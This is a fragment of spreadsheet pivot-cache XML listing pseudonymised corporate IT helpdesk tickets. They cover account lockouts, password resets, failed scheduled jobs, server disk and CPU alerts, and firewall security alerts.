  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1148"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1148 at 08/18/16 01:15:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="configuration of knowledge center "/>
    <s v="_x000d__x000a__x000d__x000a_received from: rnueobcz.lwhcbati@gmail.com_x000d__x000a__x000d__x000a_please add/connect the below mail id to my outlook._x000d__x000a_i need access to send &amp; receive the emails. it should work with both mine &amp; gslpdhey ksiyurvlir's outlook._x000d__x000a__x000d__x000a_-knowledge.center@company.com&lt;mailto:-knowledge.center@company.com&gt;_x000d__x000a_w-in-knowledge.center@company.com&lt;mailto:w-in-knowledge.center@company.com&gt;_x000d__x000a__x000d__x000a_action request urgent._x000d__x000a__x000d__x000a_thanking you_x000d__x000a_"/>
    <s v="rnueobcz lwhcbati"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface down ::usa switch :: bottom-6509-msfc720 switch since  8/17/2016 11:46 pm est"/>
    <s v="  interface down ::bottom-6509-msfc720 switch since  8/17/2016 11:46 pm est_x000d__x000a__x000d__x000a_switch description:_x000d__x000a__x000d__x000a_gigabitethernet4/14 Â· infoblox trinzic 1420 dns node 2 ha 10.32.1.10 / vip 10.32.1.11"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="3"/>
  </r>
  <r>
    <s v="reset passwords for ezrsdgfc hofgvwel using password_management_tool password reset."/>
    <s v="the"/>
    <s v="ezrsdgfc hofgvwel"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for ezrsdgfc hofgvwel using password_management_tool password reset."/>
    <s v="the"/>
    <s v="ezrsdgfc hofgvwel"/>
    <x v="16"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1141"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1141 at 08/17/16 23:45:30"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="printer setup"/>
    <s v="help to install the network printer on the laptop"/>
    <s v="kilywpuo dcksxjeq"/>
    <x v="18"/>
  </r>
  <r>
    <s v="telephony_software è½¯ä»¶å‡çº§åŽ, æ‰“å°æ–‡ä»¶æ—¶-prtpu07 æ‰“å°æœºæç¤ºé”™è¯¯ã€‚"/>
    <s v="telephony_software è½¯ä»¶å‡çº§åŽ, æ‰“å°æ–‡ä»¶æ—¶-prtpu07 æ‰“å°æœºæç¤ºé”™è¯¯ï¼Œæ— æ³•æ‰“å°åˆ°æ‰“å°æœºã€‚"/>
    <s v="tdsmnuib entgzrhy"/>
    <x v="31"/>
  </r>
  <r>
    <s v="account locked in erp SID_34"/>
    <s v="account locked in erp SID_34"/>
    <s v="lqzrgsko yaixmtqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry for adding digital signature in pdf"/>
    <s v="inquiry for adding digital signature in pdf"/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in to skype"/>
    <s v="unable to sign in to skype"/>
    <s v="zxlhkpfi zylaghei"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch business_client, getting microsoft.net error"/>
    <s v="unable to launch business_client, getting microsoft.net error"/>
    <s v="nesmdkpr dcaqoxsy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1045: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%)."/>
    <s v="HostName_1045: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%). out of total size 100.0 gb"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="HostName_973: total cpu is now 100.00%, which is above the error threshold (99%)"/>
    <s v="HostName_973: average (5 samples) total cpu is now 100.00%, which is above the error threshold (99%)"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="lhqsm518: hrsync sync failed!  no sync detected in the last 24 hours...please investigate"/>
    <s v="lhqsm518: hrsync sync failed!  no sync detected in the last 24 hours...please investigate"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="email contacts issue"/>
    <s v="email contacts issue_x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-deleted the ms crm and reconfigured the mscrm._x000d__x000a_-restarted the pc and reconfigured the outlook._x000d__x000a_-caller confirmed that he is now able to see the emails on outlook._x000d__x000a_-issue resolved."/>
    <s v="klsrmzvq otsdnmzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 7350: monitor display issue."/>
    <s v="dell 7350: monitor display issue."/>
    <s v="mwjcsiug fbwthoca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1852"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1852 at 08/17/16 17:18:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ess problems - expense report"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jnqmvard.jiazxvcl@gmail.com_x000d__x000a__x000d__x000a_i am trying to do my expense report thru ess and it's not working, a blank screen pop up after i click oon the expense report link_x000d__x000a__x000d__x000a_"/>
    <s v="jnqmvard jiazxvcl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot receive calls through telephony_software. the call comes through, and rings one time, then goes to warehouse_toolmail. i closed telephony_software and"/>
    <s v="name:tfgtodd panelfgt_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lwbchnga.axpqctfr@gmail.com_x000a_customer number:_x000a_telephone:803_x000a_summary:hello. i cannot receive calls through telephony_software. the call comes through, and rings one time, then goes to warehouse_toolmail. i closed telephony_software and rebooted my phone, and it is still doing this."/>
    <s v="lwbchnga axpqctfr"/>
    <x v="6"/>
  </r>
  <r>
    <s v="please reset your security to the collaboration_platform lagp area"/>
    <s v="please reset your security to the collaboration_platform lagp area"/>
    <s v="gylicjpx owlrismj"/>
    <x v="15"/>
  </r>
  <r>
    <s v="cannot see receipts for travel reimbursement"/>
    <s v="the link to see receipts and reimbursement form submitted by team member is broken in mss."/>
    <s v="xidbvzsk yrlsnxio"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i need access to netweaver drawings.  i also need erp access for nxd type drawings.  i am being denied access in erp "/>
    <s v="unable to access drawings in erp.  need access to net weaver"/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( in33426117 ) : correlation rule triggered: icmp ping failure"/>
    <s v="related events: _x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 80657337_x000d__x000a_event summary: [hw] service icmp/icmp is down_x000d__x000a_source ip: 10.44.86.12_x000d__x000a_source hostname: ap-f5_x000d__x000a_destination hostname: _x000d__x000a_device ip: 10.44.86.12_x000d__x000a_device name: ap-f5.company.com_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 2132464_x000d__x000a_sherlockruleid = 566281_x000d__x000a_ileatdatacenter = true_x000d__x000a_srchostname = ap-f5_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;808333:0.5001:0.0061|ngm:0.9619:0.0008;_x000d__x000a_foreseeinternalip = 10.44.86.12_x000d__x000a_irreceivedtime = 1469623856316_x000d__x000a_foreseeconndirection = internal_x000d__x000a_inspectoreventid = 860011815_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 1_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_from 46.45.62.5144 for device 10.44.86.12 summary: service icmp/icmp is down_x000d__x000a_detail: service check failed! (100% failures)_x000d__x000a_(icmp-echo) unable to ping 10.44.86.12"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="need to get the expense reports direct deposited as well?"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_rakthyesh ramdntythanjesh_x000a_ hi kylfgte_x000a_kylfgte_x000a_ hello!_x000a_ how are you today?_x000a_rakthyesh ramdntythanjesh_x000a_ i am doing great, how about you_x000a_kylfgte_x000a_ good "/>
    <s v="uazkjifp dhtnevcq"/>
    <x v="51"/>
  </r>
  <r>
    <s v="erp SID_34 password locked"/>
    <s v="erp SID_34 password locked"/>
    <s v="cyhiwbru nsfroezg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33417637 ) : repeat outbound connection for 135/tcp from 10.16.143.221"/>
    <s v="source ip :10.16.143.221_x000a_destination ip: 31.199.53.9_x000a_system name :edml8111119_x000a_user  name: ptczqbdw ybaoluck(dalgtylam)_x000a_location :milano ds_x000a_sep , sms status :no updates_x000a_field sales user ( yes / no) :  no_x000a_dsw event log:see below_x000a_----------------------------------------------------------------_x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_____________________________________________________________________________x000a_event id: 70619902_x000a_event summary: repeat outbound connection for 135/tcp_x000a_log time: 2016-07-26 at 15:46:55_x000a_source ip: 10.16.143.221_x000a_source hostname: edml8111119_x000a_destination ip: 31.199.53.9_x000a_destination hostname: host9-53-static.199-31-b.business.telecomitalia.it._x000a_device ip: 80.71.06.702_x000a_device name: company-european-asa.company.com-1_x000a_event extra data:_x000a_inspectorruleid = 186739_x000a_cvss = -1_x000a_sherlockruleid = 237526_x000a_ctainstanceid = 0_x000a_irreceivedtime = 1469548921441_x000a_inspectoreventid = 619150866_x000a_eventtypepriority = 1_x000a_foreseeinternalip = 10.16.143.221_x000a_logtimestamp = 2570659126_x000a_foreseeconndirection = outgoing_x000a_srcassetofinterest = 267_x000a_foreseeexternalip = 31.199.53.9_x000a_ontologyid = 200020003203009162_x000a_srchostname = edml8111119_x000a_eventtypeid = 200020003203009062_x000a_proto = tcp_x000a_dstport = 135_x000a_action = blocked_x000a_ileatdatacenter = true_x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;808333:0.0038:0.0061|ngm:0.0055:0.0061;_x000a_foreseedstipgeo = rome,ita_x000a_agentid = 103761_x000a_srcmacaddress = 0a:f5:9a:d1:3d:17:00:00:00:00:00:00:00:00:00:00_x000a_srcport = 65364_x000a__x000a__x000a_occurrence count: 177_x000a_event count: 1_x000a__x000a_event detail:_x000a_jul 26 15:46:55 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.143.221/65364 dst noris:31.199.53.9/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a__x000a_[correlation_data]_x000a_jul 26 05:17:23 60.43.89.120 dhcpd[12402]: dhcpack on 10.16.143.221 to 0a:f5:9a:d1:3d:17:00:00:00:00:00:00:00:00:00:00 (edml8111119) via eth2 relay 10.16.4.26 lease-duration 28800"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="69"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="ybplwrez lqcyehbf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="our server is getting full again. i have found 27g that i can erase, but that won't last too long. can you help?"/>
    <s v="name:schtrtgoyht_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:shpnkgir.mpsycbxl@gmail.com_x000a_customer number:_x000a_telephone:   ext 2335_x000a_summary:our server is getting full again. i have found 27g that i can erase, but that won't last too long. can you help?_x000a_server :  ldsm003"/>
    <s v="shpnkgir mpsycbxl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="can't open outlook"/>
    <s v="can't open outlook , i had same issues earlier this week "/>
    <s v="ufxdkqbc uehvxmfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_108: disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 80.0 gb"/>
    <s v="HostName_108: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 80.0 gb"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="it assistance. need access usaed to collaboration_platform lagp link."/>
    <s v="_x000d__x000a__x000d__x000a_received from: mgcivbtx.bshmfxya@gmail.com_x000d__x000a__x000d__x000a_it,_x000d__x000a__x000d__x000a_i currently cannot access the lagp form (hyperlink) in collaboration_platform. suomfxpj izcwuvgo stated i need to contact it for usaed access._x000d__x000a__x000d__x000a_i clickâ€¦_x000d__x000a__x000d__x000a__x000d__x000a_and receiveâ€¦_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="mgcivbtx bshmfxya"/>
    <x v="15"/>
  </r>
  <r>
    <s v="blade chassis HostName_1170 (ip 79.40.48.896) is reporting &quot;non critical&quot; hardware issues. "/>
    <s v="hi team, _x000d__x000a__x000d__x000a_with the new functionality and features that monitoring_tool provides us, we have started monitorixepyfbga wtqdyoinware sensors. we started receiving alerts for the HostName_1170 blade chassis (79.40.48.896). the iom sensor and in turn the chassis is reporting some &quot;non critical&quot; alerts. could you please investigate and advise? _x000d__x000a_"/>
    <s v="boxrlpec fnkhwytl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="blade chassis HostName_1170 (ip 79.40.48.896) reporting &quot;non critical&quot; hardware issues."/>
    <s v="blade chassis HostName_1170 (ip 79.40.48.896) reporting &quot;non critical&quot; hardware issues._x000d__x000a__x000d__x000a__x000d__x000a_hi team, _x000d__x000a__x000d__x000a_with the new functionality and features that monitoring_tool provides us, we have started monitorixepyfbga wtqdyoinware sensors. we started receiving alerts for the HostName_1170 blade chassis (79.40.48.896). the iom sensor and in turn the chassis is reporting some &quot;non critical&quot; alerts. could you please investigate and advise? _x000d__x000a_"/>
    <s v="boxrlpec fnkhwytl"/>
    <x v="11"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: archive_idocs_daily_SID_39"/>
    <s v="received from: monitoring_tool@company.com_x000a__x000a_ abended job in job_scheduler: archive_idocs_daily_SID_39 at 08/17/16 14:07:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="symantec endpoint encryption (see) agent roll out - europe region - only sales pc's"/>
    <s v="_x000a__x000a_received from: yqlvfkih.folbpugd@gmail.com_x000a__x000a_dear folks,_x000a_i would like to thank all the site administrators whoever took part in this see agent pilot uacyltoe hxgayczeing and helped us through giving the honest feedbacks on the installation behavior time to time. this overall helped us to complete the full-fledge uacyltoe hxgayczeing and promote this package to the production rollout ._x000a__x000a_we have planned to deploy the see agent on the enclosed list of sales pc's across europe starting from 19th aug 2016 and i would presume that the site admins of sales location are in acceptance of starting this deployment from the above mentioned date (since this particular time framdntye has been announced a month back by scot trask as global communication)_x000a__x000a_in regard to this see agent rollout,  i would request you all to keep your respective location users informed about the deployment schedule, and also please ensure that all the users are familiar with the package installation steps (type of package, installation duration, importance of the package, mode of the installation, times of reboot and installation behavior) through referring the below details._x000a__x000a__x000a__x000a_deployment date: - august 19th 2016 - friday_x000a__x000a__x000a__x000a_time: - 9.00 am in the morning (as per the respective location time zone)_x000a__x000a__x000a__x000a_deployment tool: - patching_antivirus_sw_x000a__x000a__x000a__x000a_package type: - prompted. user will be prompted with prior notification to save all the work before proceeding the installation through clicking the continue button._x000a__x000a_duration: - 10 - 15 minutes_x000a__x000a_restart required: -  yes (automatic restart after the installation of see agent)_x000a__x000a__x000a__x000a_package behavior: - please ask the sales users to go through the below provided bill bankrd and understand the importance of the package deployment ._x000a__x000a__x000a__x000a_[cid:image001.jpg@01d1f8c2.4c71b800]_x000a__x000a__x000a__x000a_we have uacyltoe hxgayczeed, validated and finalized the see agent deployment for our production environment._x000a__x000a_if any of the pc's from our deployment target list is not associated to the sales pc or got replaced or removed from the network, please do let us know via providing the comment on the separate column of the same enclosed target list (crm sales pc - see europe targetlist_64bit.xlsx  &amp; crm sales pc - see europe targetlist_32bit.xlsx), will exclude those pc's completely from this deployment._x000a__x000a_all vip and critical/machine pc's should be done manually by the respective it/site contact. for the manual installation, both site admin and the users must have the local admin privileges on the respective pc's to complete the see agent installation without any issue's._x000a__x000a_please access the following server share for manual installation (user must be either on office lan or vpn network to access the server share as provided)._x000a_\\HostName_497\see-agent-deploy&lt;file://HostName_497/see-agent-deploy&gt;_x000a__x000a_( to install on windows 32 bit systems) -  please execute the exe file which is under 32 bit folder of the above server share_x000a_( to install on windows 64 bit systems) - please execute the exe file which is under 64 bit folder of the above server share._x000a__x000a__x000a_"/>
    <s v="yqlvfkih folbpugd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1379"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1379 at 08/17/16 13:47:30"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to restore pc from hibernation after reimage to 64 bit"/>
    <s v="pc fails to restore from hibernation after re imaging to 64 bit os_x000a_after running on battery backup for 2 hours, the pc automatically goes into hibernation, causing massive data loss._x000a__x000a_please treat this on priority_x000a__x000a_pc details_x000a__x000a_pc name: aidl8912264_x000a_windows os: windows 7 sp1 64 bit_x000a_ramdnty: 8 gb_x000a__x000a_contact # "/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to execute job_scheduler jobs post client upgrades on HostName_773,HostName_1311,HostName_1321 and HostName_1319"/>
    <s v="unable to execute job_scheduler jobs post client upgrades on HostName_773,HostName_1311,HostName_1321 and HostName_1319"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="46"/>
  </r>
  <r>
    <s v="i do not have access to ethics training module"/>
    <s v="error message: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
    <s v="fhbvisgc cbxpgkwl"/>
    <x v="23"/>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deaokmqp oruitnmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for andrdgrtew p taneghrty using password_management_tool password reset."/>
    <s v="the"/>
    <s v="tjzohmve wusgaozx"/>
    <x v="16"/>
  </r>
  <r>
    <s v="account is locked"/>
    <s v="account is locked"/>
    <s v="wvdxnkhf jirecvta"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp consignment zkea issue with creating duplicate kb orders"/>
    <s v="order 35867766 zkea was created and erp generated 2 fill orders, zkb orders. order 35867760 and 35867772. see screenshot in email attached. erp should have created only 1 fill kb order. customer receive duplicate fills and will be returning the product"/>
    <s v="zsulhnxd gexdzoqy"/>
    <x v="12"/>
  </r>
  <r>
    <s v="o drive missing in machine."/>
    <s v="o drive missing"/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to ess "/>
    <s v="unable to log in to ess "/>
    <s v="dtapgezb hezmtdgo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop damaged as it fell in flight "/>
    <s v="from: prarthyr jha _x000a_sent: wednesday, august 17, 2016 4:40 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar fw: gt1z262- jhapg -issue_x000a__x000a_hi,_x000a__x000a_please refer attached photo ,laptop damaged due to fall in flight._x000a__x000a_at present system in working condition, with no issues._x000a__x000a_with repeated use hinges and seating might become problematic._x000a__x000a_please help._x000a_latitude 7350._x000a_computer name - aiml9912338_x000a_user-  jhapg_x000a_system id â€“ gt1z262_x000a_employee code â€“ 202467809_x000a__x000a__x000a__x000a_"/>
    <s v="jtqaplhs yjmpiqcu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="lhqsl909 and HostName_899 needs to be added to the log on account for bdclient1 "/>
    <s v="lhqsl909 and HostName_899 needs to be added to the log on account for bdclient1 _x000a__x000a__x000a_name:mikhghytr_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ekjobdiz.ktelzwvg@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:is there an active directory setting that allows an user id to access the company access points companysecure?_x000a__x000a__x000a_"/>
    <s v="ekjobdiz ktelzwvg"/>
    <x v="33"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1387"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1387 at 08/17/16 11:27:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="gwkdsmfx.ntorypsd@gmail.com password reset"/>
    <s v="gwkdsmfx.ntorypsd@gmail.com password reset"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with wlan in germany, germany for the attached device."/>
    <s v="problem with wlan in germany, germany for the attached device. contact yevirgnl ylhogjct for further info._x000d__x000a__x000d__x000a_mac address: e8b7484d2f72"/>
    <s v="yevirgnl ylhogjct"/>
    <x v="3"/>
  </r>
  <r>
    <s v="usa - robot (server cabinet) pc lhnw8222138 is down since 10:37am on 08/17/16"/>
    <s v="usa - robot (server cabinet) pc lhnw8222138 is down since 10:37am on 08/17/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="re: erp SID_34 access rights"/>
    <s v="_x000a__x000a_received from: vipqmdse.zkaowfrx@gmail.com_x000a__x000a_approved ragini._x000a__x000a__x000a__x000a_davidthd j wgtyills_x000a_vice president_x000a_vipqmdse.zkaowfrx@gmail.com&lt;mailto:vipqmdse.zkaowfrx@gmail.com&gt;_x000a__x000a_"/>
    <s v="vipqmdse zkaowfrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset - erp"/>
    <s v="manually reset erp password  as the password from the previous reset through password_management_tool did not work."/>
    <s v="yszectoh kqwljchg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="have a new phone, my exchange server is blocked. can you release it so that mail come in? "/>
    <s v="jvxtfhkg heptuizn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with wlan in germany, germany for the attached device."/>
    <s v="problem with wlan in germany, germany for the attached device. contact yevirgnl ylhogjct for further info."/>
    <s v="yevirgnl ylhogjct"/>
    <x v="3"/>
  </r>
  <r>
    <s v="outlook freezing while opeyctrhbkm plvnuxmrils"/>
    <s v="outlook freezing while opeyctrhbkm plvnuxmrils"/>
    <s v="hfvuzmbs vjtsakfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp error mesg &quot;order does not exist&quot; when trying to run apo and create a delivery"/>
    <s v="erp error mesg &quot;order does not exist&quot; when trying to run apo and create a delivery for order 35886433 and order 35922308 getting error mesg &quot;value of modific. counter for doc. 1146033419 in supply_chain is: 09, but should be :1&quot; see attachments._x000d__x000a_"/>
    <s v="zsulhnxd gexdzoqy"/>
    <x v="5"/>
  </r>
  <r>
    <s v="email access to mobile device."/>
    <s v="email access to mobile device."/>
    <s v="zpsoifea wvhilrpz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_891 backup server offline/missing virtual drives"/>
    <s v="physical backup server HostName_891 is down._x000d__x000a_we found that physical disks 4 and 6 have failed(attached screenshot). _x000d__x000a_HostName_891 backup server offline/missing virtual drives._x000d__x000a_drac ip 29.60.76.431_x000d__x000a_"/>
    <s v="kybgepnj idszleru"/>
    <x v="11"/>
  </r>
  <r>
    <s v="202 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1089/10.2.1"/>
    <s v="dsw in33627670_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we have detected at least 202 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1089/41.53.25.402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
    <s v="afkstcev utbnkyop"/>
    <x v="11"/>
  </r>
  <r>
    <s v="chat transfer"/>
    <s v="chat transfer"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update my erp favorites "/>
    <s v="update my erp favorites "/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company screensaver not on the computer "/>
    <s v="company screensaver not on the computer "/>
    <s v="mxifcasu cxsembup"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load webpage"/>
    <s v="unable to load webpage"/>
    <s v="mxifcasu cxsembup"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1853"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1853 at 08/17/16 09:18:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1402"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1402 at 08/17/16 09:16:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1403"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1403 at 08/17/16 09:16:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1417"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1417 at 08/17/16 09:16:31"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="unable to change quotation."/>
    <s v="unable to change quotation."/>
    <s v="txjwyami fhlgpsim"/>
    <x v="12"/>
  </r>
  <r>
    <s v="kis bug fixes and corrections"/>
    <s v="kis bug fixes and corrections "/>
    <s v="gzawrocy shbgwxep"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to access ms dynamics crm companyprod environment"/>
    <s v="error: insufficient access_x000d__x000a__x000d__x000a_please check attached email for error screenshot and contact details._x000d__x000a__x000d__x000a_i believe licenses were recently provided._x000d__x000a_"/>
    <s v="rnueobcz lwhcbati"/>
    <x v="22"/>
  </r>
  <r>
    <s v="not able to login to windows."/>
    <s v="not able to login to windows."/>
    <s v="vktxjamz whbdetvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="lwbchnga axpqctfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we are unable to clear this inwarehouse_tool from vfx3."/>
    <s v="hello,_x000d__x000a__x000d__x000a_can you please support here._x000d__x000a__x000d__x000a_we are unable to clear this inwarehouse_tool from vfx3._x000d__x000a__x000d__x000a_we need help as this is a high value inwarehouse_tool which we cannot clear._x000d__x000a__x000d__x000a_"/>
    <s v="lkwspqce knxaipyj"/>
    <x v="9"/>
  </r>
  <r>
    <s v="account unlock."/>
    <s v="account unlock."/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="Ä± cant connect netviewer"/>
    <s v="Ä± connected at vpn after Ä± saw main screen of netviewer.Ä± wrote usrr name and password after Ä± see error screen .Ä± attached this screen"/>
    <s v="ouqwcehj amtqxvpg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1854"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1854 at 08/17/16 08:39:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: hrp_SID_34_chg_point"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: hrp_SID_34_chg_point at 08/17/16 08:39:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="46"/>
  </r>
  <r>
    <s v="erp SID_34 access rights"/>
    <s v="_x000a__x000a_received from: npvmwszt.gzcpejxv@gmail.com_x000a__x000a_dear global helpdesk team,_x000a__x000a_we wanted to request you for the access right for rfvchzmp picjthkd as same of the user &quot;bagtylleg&quot; zsluxctw ptirhcwv in erp logon SID_34 system._x000a__x000a_davidthd, can you kindly approve the request so that it can provide the access to stefdgthy._x000a__x000a_warm "/>
    <s v="npvmwszt gzcpejxv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="material tax classifications zero"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hpmwliog.kqtnfvrl@gmail.com_x000d__x000a__x000d__x000a_please open an it ticket and assign to rzucjgvp ioqjgmah._x000d__x000a__x000d__x000a_"/>
    <s v="hpmwliog kqtnfvrl"/>
    <x v="29"/>
  </r>
  <r>
    <s v="email queries"/>
    <s v="email queries"/>
    <s v="skmdgnuh utgclesd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no response on call"/>
    <s v="no response on call"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset - ad"/>
    <s v="cyndy emailed requesting for password reset for jose. _x000d__x000a_emailed her the password."/>
    <s v="dxqwftir hbknpyzf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mss access is missing"/>
    <s v="_x000a__x000a_received from: omrsiqdv.iwhcpgoa@gmail.com_x000a__x000a_hi team,_x000a__x000a_my mss access is missing and i need to have the access for raising job requisition. please help to fix it._x000a__x000a_[cid:image001.png@01d1f8c1.b68633c0]_x000a__x000a__x000a__x000a_tiffrtany tafgtyng_x000a_manager hr shared services, asia pacific_x000a__x000a_omrsiqdv.iwhcpgoa@gmail.com&lt;mailto:omrsiqdv.iwhcpgoa@gmail.com&gt;_x000a__x000a__x000a__x000a_?????????????????????????????????????????????????????????????????????????????????????????????_x000a_[_x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="omrsiqdv iwhcpgoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to erp"/>
